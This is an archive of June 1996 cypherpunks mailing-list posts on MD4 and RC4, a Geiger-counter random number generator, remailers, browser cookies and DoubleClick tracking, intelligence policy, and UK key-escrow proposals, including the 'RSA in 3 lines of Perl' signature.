Subject: Re: rsync and md4
Message-ID: <199606300025.UAA04020@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> On Sat, 29 Jun 1996, Andrew Tridgell wrote:
> 
> > Now I'd like to calculate some probabilities of failure of the
> > algorithm. The fundamental thing I need to know to do the calculation
> > is the probability of a random piece of data of length n having the
> > same md4 checksum as another given piece of data of the same length.
> 
> MD4 is a hashing algorithm, but it can be used for checksuming.
> >
> > A first guess might be 2^-128 but I know that this sort of thing is
> > rarely that simple. Is md4 that good?
> 
> 2^-64.

Are you sure?  MD5 is a 128 bit hash, and the probability of collision with 
a specific random piece of data (of any length) should be 2^-128.  I could 
be wrong, but do you have any explanation of why you think the answer is 
2^-64.

<snip>

> > Why md4? I chose md4 because it seemed to be the fastest of the
> > reputedly strong, publicly available checksum algorithms. Suggestions
> > for alternative algorithms are welcome.

MD4 is the fastest hash I am aware of.  However, there has been some 
successful attacks against two rounds of MD4.  Although this is not to 
suggest that MD4 is insecure, MD5 almost as fast (~1.3 times slower) and 
more secure.
David F. Ogren                | 
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0xC626E311        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdXI1fBB6nnGJuMRAQFghwP/W0ZzdAYcbsdsCcrA97cwfw4uwug8sJWd
bjWD4Z+ski7kE4HN7bj2dRLFGke6EQZ8DiebnLIRPqGCxeyxdzotqcrsdKrgp+eN
eMfjp0Y3wVwvrPn2kVI5M0iI9kpX8tvvLh7Kp3OBvHdsBTim4aPPuM8xR2SHLSgv
/SYnhEBeYLA=
=VPWe
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Rahe <prahe@ix.netcom.com>
Date: Sun, 30 Jun 1996 15:30:23 +0800
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <31D59C58.621A@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <root@edmweb.com>
Date: Sun, 30 Jun 1996 15:32:48 +0800
To: cypherpunks@toad.com
Subject: arcfour
Message-ID: <Pine.BSF.3.91.960629210817.626B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


A few questions about RC4...

I understand that RC4 is like a one-time-pad, in that a key can not be
used more than once. What about adding a different salt to the key for
each encryption? Would that be sufficent, even if the salt (but not the
rest of the key) were known to an attacker? 

Is there any way to identify and weed out weak keys?

Does anyone have any sample data I can use to test an RC4 implementation?
A key and the first few bytes of the stream should be sufficent. 

Thanks...


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sun, 30 Jun 1996 14:40:40 +0800
To: cypherpunks@toad.com
Subject: Hardware RNG
Message-ID: <31D5D7CC.7E5C@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


I just recently built a hardware RNG, I just wanted to see what you guys 
think of it, here is how it works:

	Got a geiger counter plugged into the game port
	Weak radioactive source next to it (dont worry wont fry you)
	Use a PRNG string to do create an RC4 S-box
	Cycle through the S-box in a tight loop, each time checking to 
see if the geiger counter got a hit, if it did, record that number in 
the S-box as our first byte, do this 100 times, and we have 100 random 
numbers.

	With my radioactive source and geiger settings, you can grab 100 
random numbers in about 8 seconds, and the S-box will make a complete 
cycle between 1000 and 350,000 times between geiger hits, depending on 
how long between hits.

any thoughts? It seems to work well, no basic stat analysis reveals any 
pattern, and physicists have backed me up on radioactive decay being 
'the great randomizer'.

seeya
-- 
thecrow@iconn.net
"It can't rain all the time"

RSA ENCRYPTION IN 3 LINES OF PERL
---------------------------------------------------------
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MiddleMan Remailer <middleman@nym.jpunix.com>
Date: Sun, 30 Jun 1996 14:56:41 +0800
To: alt.privacy.anon-server@myriad.alias.net
Subject: New&Improved MiddleMan
Message-ID: <199606300240.VAA18027@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello Everyone,

	Due to several requests, I have been working on an improved
middleman remailer. Actually it's quite simple. I was able to improve the
reliability and robustness of the remailer dramatically by changing
$config{"numshuf"} = 3; to $config{"numshuf"} = 2; in the .premailrc file
for the middleman remailer. Exhaustive testing demonstrated that no code
changes to middleman itself were required. The only variable that
demonstrated the most profound performance difference is shown above. I
invite others to test the remailer for reliability and report back to me.
If it works, I'll go public with it once again. Here is the public key for
middleman. Please note the slight name change from middle-man to
middleman. One less keystroke if you know what I mean. I invite your
comments.

middleman middleman@nym.jpunix.com d020c2e68f1861098812ffaadd6e8a7d 2.0.3

-----Begin Mix Key-----
d020c2e68f1861098812ffaadd6e8a7d
258
AAS/9+NieAH945N1PYtLzSxnhUxVrfPR/OIAcQDM
61v5WGfpgXAltjMRQ0PHaBibeuER2/JhF5uDh4tu
nypppGDshlrajeX/RuXMN38UPRMZPDKwNzP2oddB
l/nTy6rxcdRUclBfzzoERUUay9RSiScbpnfvcm3g
R2Qgv3taGiAf+wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

				middleman-admin@nym.jpunix.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 30 Jun 1996 07:42:13 +0800
To: cypherpunks@toad.com
Subject: The Net and Terrorism
Message-ID: <adfaddeb070210049285@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



There have been many recent reports linking the Net and anonymous
remailers, pseudonyms, and (of course) strong crypto to various possible
and actual terrorist events, with an emphasis on the "possible." (If the
Net is linked to _actual_ terrorist incidents, little is being disclosed
publically as of yet.)

Recent comments by John Deutch, William Perry, and Louis Freeh make
reference to the growing danger of the Net. And the "Russian mafia" is
playing a major role in this debate; I won't recap the various articles in
major magazines about arms sales from the former Soviet Army, the reports
that an entire paramilitary unit of the KGB is now working for the Russian
mafia, and the obvious corruption of the entire former Soviet system (I'm
not saying it wasn't corrupt before, just that now the paymasters have
changed).

Can anything be done? To stop the likely effects of lots more
surface-to-air missiles, lots more nerve gas available on the black market,
and so on?

In a word, "no."

I've been thinking about this a lot, reading the various articles, and
pondering the implications. The plain fact is that the modern world is one
of great "liquidity," and the vast amount of arms built up by the U.S.S.R.
(thanks in large part to responding to a similar build-up in the U.S.,
without taking any sides...) are now "leaking out" in increasing numbers.

(The leakage is quite similar to that seen in the 1975-79 period, when
thousands of tons of armaments abandoned by the U.S. in Viet Nam were sold
around the world. Except, of course, that the the Soviet weapons include
some interesting new things.)

Not even a police state can stop armaments from being diverted in
situations such as faced in the former U.S.S.R. (For those not familiar
with the conditions, read up on it. The combination of former command
economy, secret police, selling off of industry to highest bidders, lack of
a conventional industrial base...all of this makes it nearly unavoidable
that much of the former state industry is now controlled by black
marketeers and former Party apparatchniks....after all, who else would have
the money to buy these former State industries?)

In fact, a former police state does not change its stripes. The names and
paymasters change a bit, but the organism lives on. (One need only look at
the police states of Central and South America and their platitudes about
the "Drug War" to understand the realities of such markets.)

Unbreakable crypto will of course be used. This is unsurprising.

A few airliners will shot down by Soviet surface-to-air missiles. This is
unsurprising.

I expect a city or two to get nuked in the next decade or so. (Haifa or Tel
Aviv would be my leading candidates.) To me, this is unsurprising.

My personal solution dovetails with other perceived threat responses: avoid
living in or near major cities and take reasonable measures to cope with
moderate economic or physical crises. (No, I am not a "survivalist," just
mentally and physically prepared to deal with a major earthquake, economic
dislocation, or terrorist incident in San Jose, which is 30 miles north of
me.)

FBI Director Louis Freeh and the TLA spooks are already sounding the alarm
about the "Four Horsemen." Sen. Sam Nunn is calling for measures to ensure
that cyberspace is "secured" and that the Net is not used to further
chemical and biological terrorism.

The point is that even a police state cannot stop the consequences of the
increased "degrees of freedom" the modern world (and the Net) provides. In
fact, police states tend to make the scale of the corruption even greater,
as the Soviet and Latin American examples show. (I could of course get into
the examples of arms dealings in Iran-Contra, the CIA's role in covert arms
supply, etc., but this should be self-evident to all.)

An Australian radio journalist asked me if the Net could make possible new
types of terrorism, and could allow terrorists to plot crimes in new ways.
He seemed surprised when I said "Of course" and then proceeded to give some
examples of how the Net can be used to undermine governments (what those
governments of course refer to as "terrorism," even when it is mostly not).

I'm not advocating such "terrorism," by the way, merely telling it like it is.

Arguing that the Net cannot and will not be used in such ways is naive and
ultimately counterproductive. It is more accurate and useful to point out
that the increased role of terrorism is due to many factors, including
prominently the vast amount of armaments in the world, the role of police
states which have benefitted from these build-ups in the
military-industrial complex, the expansion of "virtual communities" around
the world, and, crucially, the expanded number of degrees of freedom in
transportation, communication, banking, and other such Information Age
channels.

Keep your head down, avoid crowded downtown areas, prepare for moderate
disruptions, and reject arguments that an American Police State will do
anything to stop terrorism.

(Remember, terrorism is just warfare carried on by other means, with
apolgies to Von Clausewitz.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Yanni" <jon@aggroup.com>
Date: Sun, 30 Jun 1996 16:23:24 +0800
To: vanished@alpha.c2.org
Subject: Re: Cookies anyone?
Message-ID: <9606292209.AA49109@jon.clearink.com>
MIME-Version: 1.0
Content-Type: text/plain


> Rather than bring down my system by experimenting, I thought I'd ask
> the list, "What happens if I delete this file?"

you loose any cool stuff that cool sites give you. we are using them
(along with searchArgs) for a client to allow a "buddie" to follow
you around the site....when you come back, the buddy tells you how long
you have been gone, etc...a really cool fun harmless application of
cookies that makes the user experience much more fun and personal...

> and "What happens if
> I delete (edit) the cookies?"

if you don't keep the format, navigator will probably remove that line
when it starts up.

if you keep the format, and have edited the cookie, the site on the
other end might not know what to do with the cookie when it gets it
again...(depends on how good the error checking, etc is...)

> This may have been discussed before, but until now I never checked
> for cookies.

either way, contrary to popular belief, cookies really aren't a
security risk because they don't contain any information that you
don't already know. if a site gives you a cookie with your password in
it ( especially in clear text ), then they (the cgi programmers) are
idiots and should be shot on the spot.

regards,

-jon

Jon (no h) S. Stevens        yanni@clearink.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
We are hiring! Check out...
http://www.clearink.com/clearink/home/job.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 30 Jun 1996 07:40:43 +0800
To: cypherpunks@toad.com
Subject: Re: fbi botches intel "ecspionage" case
Message-ID: <adfae81f08021004f81e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:25 PM 6/29/96, Larry Detweiler wrote:

>we already have a very good example where this has
>backfired. I was watching Nightline on Tues night or
>so in which there was info about how the FBI helped
>get an informant into Intel in a *very* sensitive
>position, where he was able to film the pentium chip
>plans. he said he sold them, as I recall,
>to iraq, syria, china, etc.

I didn't see this particular "Nightline," so I can't be certain this is the
same case I have been casually following for a couple of years. However, it
sounds like the case of the guy who spent a year at Intel, stole some
design tapes, went to work for AMD, offered them to AMD, had AMD refuse him
and report his offer to Intel (the chip companies are very cooperative in
these matters), and then proceeded on a bizarre course of offering the
tapes to various foreign nations.

A comedy of sorts, and his "damage" was essentially meaningless.

I don't recall _anything_ about him being planted by the FBI within Intel,
nor can I imagine any circumstances in which the FBI would try this. So
maybe I'm thinking of a different story.

>solve the problem. there was much lamentation over the
>fact the criminal in question only got about 33 months
>of prison time or something.
>
>the FBI emerged with great egg on their face. I would
>say if anyone wants to ridicule them for getting into
>covering "ecspionage" cases, this is a prime candidate
>case. is this what they are aiming for? heh, heh.

Well, the "33 months" sounds like the story I remember. Bear in mind that
the tapes he took were essentially useless. A comedy, as I said.

(He was down in Brazil, living with his parents, sending out press releases
on how he had sold the tapes to Cuba and other such countries. He
voluntarily returned to the U.S. to face charges, so it sure looks like he
wanted to get caught....a psychological case more than a national security
case.)

>somehow we have missed a good public debate about
>ecspionage in the country. there were a few NYT
>editorials, but it is clearly being used as a very
>major aspect of promoting the new post-cold-war spy
>and intelligence strategy without almost any notice
>by major analyists.

Larry, you must not have been subscribed during the months when we debated
this issue many times. There have also been numerous mentions of this since
at least 1990, when I recall discussions of a change in mission for the
NSA.


>2. we have a tradition of separation of church and state in
>this country, and also separation of the public government
>and private industry. suddenly we have the FBI saying they
>want to infiltrate companies to deal with economic espionage.
>well, these companies have their own policy, and what do
>they gain by having a government agency working inside them?
>in the above case I note, it led to exactly the *opposite*
>of what was intended: the theft of *highly*sensitive* plans
>by an FBI mole.

In the case I described, involving Intel and Pentium plans and a recent
prison sentence, this was not the case. The FBI did not plant the thief.


>if someone else can give more info on this case (apparently
>a book is coming out about it or something) including the
>guy's name, I'd appreciate it, I didn't take any notes so
>this is a bit fuzzy.

I'm sure an Alta Vista search would turn up this story. I don't plan to do
it, though. I'm relatively certain the "Nightline" piece you cite is
related to the case I've described. Whether "Nightline" got its wires
crossed, or Larry did, is unknown to me.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 30 Jun 1996 16:23:07 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Doubleclick]
Message-ID: <199606300526.WAA23105@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain




[Multiple forwards deleted]

[short-attention-span summary:  someone's using Netscape
cookies as a way to target-market browser users.  Since I
hate being targeted, I came up with a hack "fix" to prevent
it, see below]


> >Date:    Wed, 26 Jun 1996 19:42:00 -0700
> >From:    Scott Wyant <scott_wyant@loop.com>
> >Subject: COMMENT: Cookie dough
> >
> >(I originally posted this to a library science listserve, and was asked to
> >post it here.  I hope it is of some interest to ADV-HTML readers)
> >
> >This list has seen discussion about the little "cookie" that a Netscape
> >server hands to your browser.  Have you wondered how someone might use it to
> >make some money?
> >
> >Here's how.
> >(This will take a while, but I think it's worth it.)
> >
> >Using Find File, look for a file called cookie.txt (or MagicCookie if you
> >have a Mac machine).  Using a text editor, open the file and take a look.
> > If you've been doing any browsing, the odds are about 80/20 that you'll find
> >a cookie in there from someone called "doubleclick.net."
> >
> >If you're like me, you never went to a site called "doubleclick."  So how did
> >they give you a cookie?  After all, the idea of the cookie, according to the
> >specs published by Netscape, is to make a more efficient connection between
> >the server the delivers the cookie and the client machine which receives it.
> >But we have never connected to "doubleclick."
> >
> >Close MagicCookie, connect to the Internet, and jump to <www.doubleclick.net>
> > Read all about how they are going to make money giving us cookies we don't
> >know about, collecting data on all World Wide Web users, and delivering
> >targeted REAL TIME marketing based on our cookies and our profiles.
> >
> >Pay special attention to the information at:
> ><www.doubleclick.net/advertising/howads.htm>
> >
> >You'll see that the folks at "doubleclick" make the point that this entire
> >transaction (between their server and your machine) is "transparent to the
> >user."  In plain English, that means you'll never know what hit you.
> >
> >So what's happening is, subscribers to the doubleclick service put a "cookie
> >request" on their home page FOR THE DOUBLECLICK COOKIE.  When you hit such a
> >site, it requests the cookie and take a look to see who you are, and any
> >other information in your cookie file.  It then sends a request to
> >"doubleclick" with your ID, requesting all available marketing information
> >about you.  (They're very coy about where this information comes from, but it
> >seems clear that at least some of it comes from your record of hitting
> >"doubleclick" enabled sites.)  You then receive specially targetted marketing
> >banners from the site.  In other words, if Helmut Newton and I log on to
> >the same site at the exact same time, I'll see ads for wetsuits and
> >basketballs, and Helmut will see ads for cameras.
> >
> >If you log in to a "doubleclick" enabled site, and it sends a request for
> >your "doubleclick" cookie, and you don't have one, why each and every one of
> >those sites will hand you a "doubleclick" cookie.
> >
> >Neat, huh?  And you can bet they're going to be rolling in the cookie dough.
> >Me, I edit my cookie file each and every time I go to a new site.  (Despite
> >the dire warning at the top of the file, you can edit it with no adverse
> >consequences.)
> >
> >Oh, and one other thing.  If you edit your cookie file BEFORE you connect to
> >"doubleclick," and then jump around at the site, you'll notice that they
> >DON'T hand you a cookie.  I probed the site pretty carefully, checking the
> >MagiCookie file, and nothing happened.
> >
> >Until I closed Netscape.  The LAST thing the 'doubleclick" site did was....
> >You guesed it.  They handed me a cookie.  So much for making the
> >client-server negotiation more efficient.  (In fairness, that cookie may
> >have been in memory until I closed Netscape -- I can't tell for sure.)
> >Scott Wyant
> >Spinoza Ltd.
> >


My own experiments shows that simply removing the cookie file
(~/.netscape/cookies) works to "fix" this, as long as you don't
have old netscape config files lying about (then it pops a dialog
asking if you want to nuke the old config, and uses the old
cookies file).  Netscape (version 3.0b for Linux) doesn't
recreate the cookies file.  Of course this "fix" means
that I'm not able to take advantage of whatever cookies might
offer me, but since I can't control them and never see them
there's probably not a lot that they do that I'll miss.


I think that Netscape should add a configuration to the browser
so that paranoid privacy fanatics like me can disable cookies
or better yet control which ones that we'll accept.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sun, 30 Jun 1996 16:47:36 +0800
To: cypherpunks@toad.com
Subject: Re: Cookies anyone?
Message-ID: <2.2.32.19960630055331.00741f70@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 6/29/96 -0700, vanished@alpha.c2.org wrote:
>While rummaging around in my cookie jar, I found this message--along with
some cookies.
>
>:Netscape HTTP Cookie File
>:# http://www.netscape.com/newsref/std/cookie_spec.html
>:# This is a generated file!  Do not edit.
>
>Rather than bring down my system by experimenting, I thought I'd ask the
list, "What happens if I delete this file?" and "What happens if I delete
(edit) the cookies?"
>
>This may have been discussed before, but until now I never checked for cookies.
>
>Thanks for your consideration of this matter.
>
>Vanished  
>


Delete it at will.

Cookies are small tidbits of information that server side CGI progs (and
client side JavaScript progs) have saved. Cookies are generally used to
identify web users when they return to a site. I've seen cookies named
"lastvisit", "userid", and so on. If pathfinder.com creates a cookie, it is
only visible to pathfinder.com (that's the theory anyway). 

Deleting the cookie.txt file will have no ill effects unless you are using
one of those "build yer own Start Pages" at MSN or wherever. Altering
cookies would send garbage down when the cookie is requested.

If you would rather that cookies (and crumb trails) not be allowed simply
delete any cookies present and make the nominal file read only.

John.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Sun, 30 Jun 1996 17:43:10 +0800
To: vanished@alpha.c2.org
Subject: Re: Cookies anyone?
In-Reply-To: <199606292334.QAA20775@infinity.c2.org>
Message-ID: <Pine.BSI.3.93.960629232908.23436B-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jun 1996 vanished@alpha.c2.org wrote:

> While rummaging around in my cookie jar, I found this message--along with 
> some cookies.
> 
> :Netscape HTTP Cookie File
> :# http://www.netscape.com/newsref/std/cookie_spec.html
> :# This is a generated file!  Do not edit.
> 
> "What happens if I delete this file?" 

Nothing (other than the file getting deleted).

> "What happens if I delete (edit) the cookies?"

They get deleted/edited.

When I was testing some cookie stuff, I regularly deleted several cookies
manually while Netscape was running, with no ugliness resulting. Since
there is no way to delete them from Netscape itself, vi is about the
best option.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 30 Jun 1996 14:59:22 +0800
To: cypherpunks@toad.com
Subject: In From the Cold
Message-ID: <199606300203.CAA08970@pipe2.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   June 28 the NYT and Wash Post reported on a new report on 
   intelligence: 
 
      In From the Cold: The Report of the Twentieth Century 
      Fund Task Force on the Future of U.S. Intelligence. 
 
   This report supplements and differs somewhat from the three 
   released earlier this year by the Brown Commission, 
   Representative Combest's Committee and the Council on 
   Foreign Relations. It recommends greater emphasis on 
   economic intelligence and less on military support as well 
   as reduction of covert operations. Here's an excerpt from 
   the Foreword: 
 
      The Task Force discerned basic problems that merit far 
      greater attention. Foremost among them is the 
      intelligence community's increasing preoccupation with 
      military priorities since the Soviet Union's collapse, 
      which has coincided with a decline in the usefulness of 
      intelligence to civilian policymakers. To help strike a 
      more equitable balance between the military and civilian 
      needs of the government, the Task Force proposes 
      specific recommendations for strengthening what it 
      perceives to be four pervasive shortcomings: 1) the 
      atrophying analytic capabilities of the intelligence 
      community and U.S. foreign policy agencies; 2) the lack 
      of productive and effective interactions between the 
      intelligence community and civilian officials who make 
      foreign policy decisions; 3) a clandestine service whose 
      costs have too often exceeded its benefits; and 4) 
      poorly organized, unfocused, and often mediocre economic 
      intelligence efforts. 
 
   The full volume is 275 pages, composed of introductions,  
   the main 21-page report and three extensive and detailed 
   background papers of 248 pages. 
 
   The introductions and main report are at: 
 
      http://pwp.usa.pipeline.com/~jya/infrom.txt  (60 kb) 
 
   INF_rom 
 
   ---------- 
 
      In From The Cold: The Report of the Twentieth Century 
      Fund Task Force on the Future of U.S. Intelligence. 
 
      With Background papers by Allan E. Goodman, Gregory F. 
      Treverton and Philip Zelikow 
 
      The Twentieth Century Fund Press, New York, 1996. $5.95 
      ISBN 0-87078-392-0 
 
      To order by telephone: 1-800-552-5450 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 30 Jun 1996 14:58:26 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous mailing lists
Message-ID: <199606300249.EAA26246@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal sez:
: Wei Dai did some nice statistical analysis of this type of attack
: sometime a year or two ago.  Even with countermeasures such as you
: suggest, if they are not perfect, so some information leaks correlating
: incoming and outgoing messages, Wei showed that it was possible to
: deduce the owners of the nyms surprisingly quickly.

: The countermeasures do work - if you get and send exactly 50 pieces of
: 4K byte email every day, no matter what, then correlations don't exist
: - but they are expensive to do perfectly.  For now we have much worse
: weaknesses; none of the current return-address systems are really safe,
: other than posting encrypted mail to newsgroups (and even that may be a
: problem if they suspect who you are and are monitoring your computer
: link to see if you download certain messages).

Use ssh or any other link encryptor, or fetch the whole newsgroup using
uucp.

--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 30 Jun 1996 16:22:02 +0800
To: cypherpunks@toad.com
Subject: Re: Hardware RNG
Message-ID: <adfb5d610a0210048597@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:26 AM 6/30/96, Jack Mott wrote:
>I just recently built a hardware RNG, I just wanted to see what you guys
>think of it, here is how it works:
>
>        Got a geiger counter plugged into the game port

>any thoughts? It seems to work well, no basic stat analysis reveals any
>pattern, and physicists have backed me up on radioactive decay being
>'the great randomizer'.

First, have fun playing with it. Second, watch out for subtle statistical
biases.

While radioactive decay is unpredictable (so are a lot of things, by the
way), there are all kinds of biases that reduce the apparent entropy.
Detector "dead time" is a classic one (basically, the detector can't detect
counts during a post-pulse recovery time...probably not a problem at low
count rates, but an example of how subtle things can sneak in).

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 30 Jun 1996 23:13:02 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: RNG
Message-ID: <199606301251.IAA00411@nrk.com>
MIME-Version: 1.0
Content-Type: text



> 
> I just recently built a hardware RNG, I just wanted to see what you guys 
> think of it, here is how it works:
> 
> 	Got a geiger counter plugged into the game port
> 	Weak radioactive source next to it (dont worry wont fry you)
> 	Use a PRNG string to do create an RC4 S-box
> 	Cycle through the S-box in a tight loop, each time checking to 
> see if the geiger counter got a hit, if it did, record that number in 
> the S-box as our first byte, do this 100 times, and we have 100 random 
> numbers.
> 


Tony Patti just gave the DC 'Punks a great talk on this topic.
He built a faster RNG he called RANGER -- it connects to the parallel
port. Plans for it are available in Cryptosystems Journal....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Mon, 1 Jul 1996 01:14:16 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: Updated type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960630092316.238B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	There is an updated type2.list/pubring.mix available on
jpunix.com. Of note is the new jam remailer and the return of middleman.
Welcome aboard! BTW you may have noticed that I've started sorting the
type2.list file. I think it looks nicer that way. The files are available
by WWW from www.jpunix.com as well as anonymous FTP from ftp.jpunix.com.
Please direct questions or suggestions to perry@alpha.jpunix.com.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdaO8lOTpEThrthvAQH4JQP9HYP+TbIZ8VO1v5lvRUfJfM0GDlakuCaN
WK1CWQyCY79QLUs9GAAIksim+VyvfS9g1pg7zrsmy5S4MgZRMAX5NkWTg/+BNqKk
M8LnDBAU2hSPNzjmNUiO9KhAgoein7z3Dy91ZOuaPGRNf6GhE0i8QjPTKKL81lzz
75+oY9rObEQ=
=oR/A
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sun, 30 Jun 1996 19:45:46 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: UK Crypto regs?
In-Reply-To: <Pine.SUN.3.91.960628170810.25672C-100000@tipper.oit.unc.edu>
Message-ID: <199606300840.JAA00124@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



> Anybody got a trip report for the IEE meeting yesterday? I phoned the 
> IEE press office, but no-one there seemed to have any briefings, and 
> there didn't seem to be any coverage

Ross Anderson posted this report on sci.crypt:

Adam

======================================================================
From: rja14@cl.cam.ac.uk (Ross Anderson)
Newsgroups: sci.crypt,alt.security,uk.telecom,alt.security.pgp
Subject: HMS Clipper - GCHQ bungling!
Date: 28 Jun 1996 12:20:19 GMT

I went to the meeting organised at the IEE yesterday on the UK
`Trusted Third Party' proposals. One of the speakers, Nigel Hickson of
the DTI, confirmed that escrowing of confidentiality keys would be
mandatory. He also claimed that an OECD expert group was working on
`global crypto guidelines', and made clear that the controls would
focus on small-to medium enterprises and individuals rather than on
large companies.

It was a most extraordinary meeting, and showed up GCHQ in a rather
poor light. The introductory talk was given by Andrew Saunders,
advertised as head of CESG (GCHQ's protection arm) since 1991 and a
